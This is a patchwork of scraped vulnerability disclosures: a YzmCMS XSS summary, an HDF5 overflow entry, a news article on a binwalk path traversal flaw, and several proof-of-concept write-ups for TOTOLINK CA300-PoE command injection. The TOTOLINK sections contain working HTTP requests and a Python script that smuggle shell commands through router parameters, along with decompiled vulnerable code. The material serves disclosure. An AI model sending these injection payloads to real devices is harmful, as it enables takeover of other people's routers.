Cross Site Scripting (XSS) vulnerability in yzmcms 6.1 allows attackers to steal user cookies via image clipping function.

**我们的优势**

OUR ADVANTAGE

YzmCMS（以下简称本产品）采用面向对象方式自主研发的YZMPHP框架开发，它是一款开源高效的内容管理系统，产品基于PHP+Mysql架构，可运行在Linux、Windows、MacOSX、Solaris等各种平台上。

本产品自v3.0起，完全采用MVC框架式开发，增加了程序的维护性、可扩展性，并采用模块化开发设计，使二次开发变得简单、容易，系统设计的模板标签，让前端人员可独立完成模板制作及数据调用，后台管理员可自定义模型功能，不会编程就实现各种信息发布和检索。

本产品源码简洁、严谨、安全、高效、源码100%开源，作者用心优化每一行代码，减少冗余，给用户的第一感觉就是“快”，程序运行快、加载快、效率高、轻量级！！！

CVE-2021-36712: YzmCMS官方网站 - 轻量级开源CMS

Buffer Overflow vulnerability in HDFGroup hdf5-h5dump 1.12.0 through 1.13.0 allows attackers to cause a denial of service via h5tools_str_sprint in /hdf5/tools/lib/h5tools_str.c.

CVE-2021-37501: Something_Found/HDF5_v1.13.0_h5dump_heap_overflow.md at main · ST4RF4LL/Something_Found

Path traversals could ‘void reverse engineering efforts and tamper with evidence collected’

Adam Bannister 03 February 2023 at 16:36 UTC  
Updated: 03 February 2023 at 16:37 UTC

Path traversals could ‘void reverse engineering efforts and tamper with evidence collected’

Security analysis tool Binwalk itself poses a security risk to users running out-of-date versions due to a path traversal vulnerability that could lead to remote code execution (RCE).

Binwalk is a popular command-line tool in Linux that is used for analyzing, reverse engineering, and extracting firmware images.

The path traversal issue requires users to open a “malicious file with binwalk using extract mode ( option)” so user interaction is required, according to a security advisory published by Quentin Kaiser of ONEKEY Research Lab.

The flaw is tracked as CVE-2022-4510 and classified as high severity (CVSS 7.8).

**Root cause**

The vulnerability was introduced by the merging of the Professional File System (PFS) extractor plugin with binwalk in 2017, and arises because an attempt to mitigate path traversal risk with failed.

The upshot is that six years later, Kaiser discovered that “by crafting a valid PFS filesystem with filenames containing the traversal sequence, we can force binwalk to write files outside of the extraction directory”.

PFS is an obscure filesystem format occasionally found in embedded devices.

**‘Environment agnostic’**

Kaiser targeted binwalk’s plugin system in a bid to achieve an “environment agnostic” path to RCE.

Plugins load on all binwalk scans once they are dropped into the Python tool’s plugin directory.

“So, if we exploit the path traversal to write a valid plugin at that location, binwalk will immediately pick it up and execute it while it’s still scanning the malicious file,” Kaiser explained. “On top of that, the PFS extractor will take care of creating all required directories if they do not exist, so we don’t need to expect anything from the system we’re running on.”

Kaiser crafted a malicious plugin that “executes two times since it does not define an explicit MODULE attribute that defines its purpose (e.g., signature scan, entropy calculation, compression stream identification). I take advantage of that behavior to make it clean up after itself.”

Vulnerable versions span 2.1.2b through 2.3.3 inclusive. The vulnerability was addressed yesterday (February 2) with the release of binwalk version 2.3.4 – more than three months after ONEKEY said it first contacted the tool’s maintainer, Microsoft-owned Refirm Labs, and provided a suggested patch, in October 2022.

**Yaffshiv**

Kaiser’s research also uncovered similar, medium severity CVEs affecting other filesystem extractors, namely the ubi\_reader, Jefferson, yaffshiv projects.

Kaiser warned that even fully up-to-date binwalk instances were potentially vulnerable to the same exploit chain because yaffshiv is installed and enabled by default on binwalk, except the attack vector would be YAFFS instead of PFS.

“Yaffshiv is maintained by the team behind binwalk so we hope a fix will be available soon,” Kaiser told The Daily Swig.

“Writing secure format parsers and extractors is a complex task (believe us, we've been working on exactly those issues with \[our own extraction suite\] Unblob) so it's not a surprise that we found these kinds of vulnerabilities in binwalk given the amount of format it supports.”

**Salutary reminder**

The research serves as a salutary reminder that security tools can themselves contain security holes. “This especially becomes critical in forensic analysis and reverse engineering where we are commonly faced with untrusted, potentially malicious files,” said Kaiser.

“While the path traversals described in this article have the potential to void any reverse engineering efforts and to tamper with evidence collected, they also demonstrate the importance of sandboxing analysis environments to limit the impact of such vulnerabilities. Especially with the rise of automated extraction and analysis tools relying on tools like binwalk (e.g., FACT, ofrak, EMBA), it’s important for developers and users of those solution to be aware of the risks.”

Kaiser hinted that ‘D-Link RomFS’ plugin could be his next focus for research as it “is probably affected by a similar vulnerability”.

The Daily Swig has approached Refirm Labs for comment. We will update this article if and when they respond.

MORE RELATED RESEARCH WAGO fixes config export flaw threatening data leak from industrial devices

Serious security hole plugged in infosec tool binwalk

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the FileName parameter in the setUploadUserData function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setUploadUserData.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" : "setting/setUploadUserData", "ContentLength":"10485", "FileName": "a|mkdir /setUploadUserData_1111;"}
    

    int __fastcall setUploadUserData(int a1, int a2, int a3)
    {
      const char *FileName_v; // $s3
      int ContentLength_v; // $s1
      int Object; // $s0
      int v9; // $s1
      int v10; // $v0
      int v11; // $s1
      const char *v13; // $a0
      int String; // $v0
      int v15; // $s2
      int v16; // $s0
      char v17[256]; // [sp+24h] [-104h] BYREF
    
      FileName_v = (const char *)websGetVar(a2, "FileName", "");
      ContentLength_v = websGetVar(a2, "ContentLength", "");
      set_action(3);
      Object = cJSON_CreateObject();
      v9 = strtol(ContentLength_v, 0, 10);
      if ( v9 < 1000 )
      {
        v13 = "MSG_userData_error";
        goto LABEL_7;
      }
      if ( v9 >= 1048577 )
      {
        v13 = "MSG_userData_big";
    LABEL_7:
        String = cJSON_CreateString(v13);
        cJSON_AddItemToObject(Object, "upgradeERR1", String);
        unlink(FileName_v);
        set_action(0);
        goto LABEL_5;
      }
      if ( !fork(0) )
      {
        sleep(2);
        memset(v17, 0, sizeof(v17));
        v15 = malloc(v9);
        v16 = f_read(FileName_v, v15, 0, v9);
        if ( CS_DBG == 1 )
          printf("(%s:%d)=> inLen=[%d]\n", "setUploadUserData", 350, v16);
        f_write("/tmp/plugin.tar.gz", v15, v16, 0);
        free(v15);
        sprintf(v17, "md5sum %s | awk '{ print $1 }' > %s", "/tmp/plugin.tar.gz", "/userdata/SysPluginMd5");
        CsteSystem(v17, 0);
        CsteSystem("tar zxvf /tmp/plugin.tar.gz -C /tmp", 0);
        CsteSystem("sh /tmp/plugin/plugin.sh", 0);
        CsteSystem("rm -rf /tmp/plugin.tar.gz", 0);
        sprintf(v17, "rm -rf %s", FileName_v);
        CsteSystem(v17, 0);
        set_action(0);
        exit(1);
      }
      v10 = cJSON_CreateString("1");
      cJSON_AddItemToObject(Object, "upgradeStatus", v10);
    LABEL_5:
      v11 = cJSON_Print(Object);
      websGetCfgResponse(a1, a3, v11);
      cJSON_Delete(Object);
      free(v11);
      return 0;
    }

CVE-2023-24148: CVE-vulns/setUploadUserData.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the hour parameter in the setRebootScheCfg function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setRebootScheCfg.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setRebootScheCfg","mode" : "1", "hour": "';mkdir /hour_1111;'"}
    

    int __fastcall setRebootScheCfg(int a1, int a2, int a3)
    {
      int mode_v; // $s5
      int week_v; // $s3
      const char *hour_v; // $fp
      const char *minute_v; // $s7
      int recHour_v; // $s0
      int v9; // $v0
      int v11; // $v0
      int i; // $s0
      _BYTE *v13; // $v0
      char *v14; // $a0
      int v15; // $s0
      int v16; // $s0
      char v19[256]; // [sp+2Ch] [-244h] BYREF
      char v20[128]; // [sp+12Ch] [-144h] BYREF
      char v21[128]; // [sp+1ACh] [-C4h] BYREF
      int v22[16]; // [sp+22Ch] [-44h] BYREF
    
      memset(v20, 0, sizeof(v20));
      memset(v21, 0, sizeof(v21));
      memset(v19, 0, sizeof(v19));
      mode_v = websGetVar(a2, "mode", "0");
      week_v = websGetVar(a2, "week", "");
      hour_v = (const char *)websGetVar(a2, "hour", "");
      minute_v = (const char *)websGetVar(a2, "minute", "");
      recHour_v = websGetVar(a2, "recHour", "0");
      cs_uci_set("system.reboot.mode", mode_v);
      cs_uci_set("system.reboot.week", week_v);
      cs_uci_set("system.reboot.hour", hour_v);
      cs_uci_set("system.reboot.minute", minute_v);
      cs_uci_set("system.reboot.recHour", recHour_v);
      cs_uci_commit("system");
      strcpy(v19, "sed -i /reboot/d /etc/crontabs/root");
      CsteSystem(v19, 0);
      CsteSystem("killall sche_reboot", 0);
      v9 = atoi(mode_v);
      if ( v9 == 1 )                                // mode=1
      {
        v11 = atoi(week_v);
        if ( v11 == 255 )
        {
          strcpy(v21, "*");
        }
        else if ( v11 )
        {
          for ( i = 1; i != 8; ++i )
          {
            if ( ((atoi(week_v) >> i) & 1) != 0 )
            {
              sprintf(v20, (const char *)&dword_4404, i);
              strcat(v21, v20);
              strcat(v21, &dword_4408);
            }
          }
          v13 = (_BYTE *)strrchr(v21, 44);
          if ( v13 )
            *v13 = 0;
        }
        sprintf(v19, "echo '%s %s * * %s reboot -f'>> /etc/crontabs/root", minute_v, hour_v, v21);
        v14 = v19;
    LABEL_13:
        CsteSystem(v14, 0);
        goto LABEL_3;
      }
      if ( v9 == 2 )
      {
        v15 = atoi(recHour_v);
        if ( v15 > 0 )
        {
          sysinfo(v22);
          v16 = 3600 * v15 - v22[0];
          if ( v16 <= 0 )
          {
            cs_cmd("reboot", 16464, 1);
            goto LABEL_3;
          }
          CsteSystem("killall sche_reboot", 0);
          sprintf(v20, "sche_reboot %ld &", v16);
          v14 = v20;
          goto LABEL_13;
        }
      }
    LABEL_3:
      cs_cmd("/etc/init.d/cron", "restart", 2);
      websSetCfgResponse(a1, a3, "0", "reserv");
      return 0;
    }

CVE-2023-24144: CVE-vulns/setRebootScheCfg_hour.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingSize parameter in the setNetworkDiag function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingSize": "100||ls;"}

CVE-2023-24142: CVE-vulns/setNetworkDiag_NetDiagPingSize.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingTimeOut parameter in the setNetworkDiag function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingTimeOut": "4||ls;"}

CVE-2023-24141: CVE-vulns/setNetworkDiag_NetDiagPingTimeOut.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the setNetworkDiag function.

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the function setNetworkDiag****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl":"setting/setNetworkDiag","NetDiagMethod":"0","NetDiagHost":"www.baidu.com|expr 50 - 3;"}
    

POC2:

    import requests
    url = "http://192.168.0.254:80/cgi-bin/cstecgi.cgi"
    cookie = {"Cookie":"SESSION_ID=2:1672999258:2"}
    data = {"topicurl" : "setDiagnosisCfg",
    "ip" : "192.168.1.1||mkdir /test1111;"}
    
    data1 = {'topicurl' : "setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagHost":"www.baidu.com|echo `ls`;"}
    
    response = requests.post(url, cookies=cookie, json=data1)
    print(response.text)
    print(response)
    
    data2 = {"topicurl":"setting/showNetworkDiag"}
    response = requests.post(url, cookies=cookie, json=data2)
    print(response.text)
    print(response)
    
    

The function setNetworkDiag is used to set the corresponding variable

In function showNetworkDiag

step into function getDiagInfo

CVE-2023-24139: CVE-vulns/setNetworkDiag_NetDiagHost.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the setNetworkDiag function.

Permalink

Cannot retrieve contributors at this time

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the function setNetworkDiag****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "1", "NetDiagTracertHop": "20||ls;"}
    

The function setNetworkDiag is used to set the corresponding variable

In function showNetworkDiag

step into function getDiagInfo，V11 is the value of system.NetDiag.method

CVE-2023-24143: CVE-vulns/setNetworkDiag_NetDiagTracertHop.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin_version parameter in the setUnloadUserData function.

Permalink

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin\_version parameter in the function setUnloadUserData****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setUnloadUserData.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" : "setting/setUnloadUserData", "plugin_version": "|mkdir /setUnloadUserData_2222;"}
    

Folder created successfully

Tag

#linux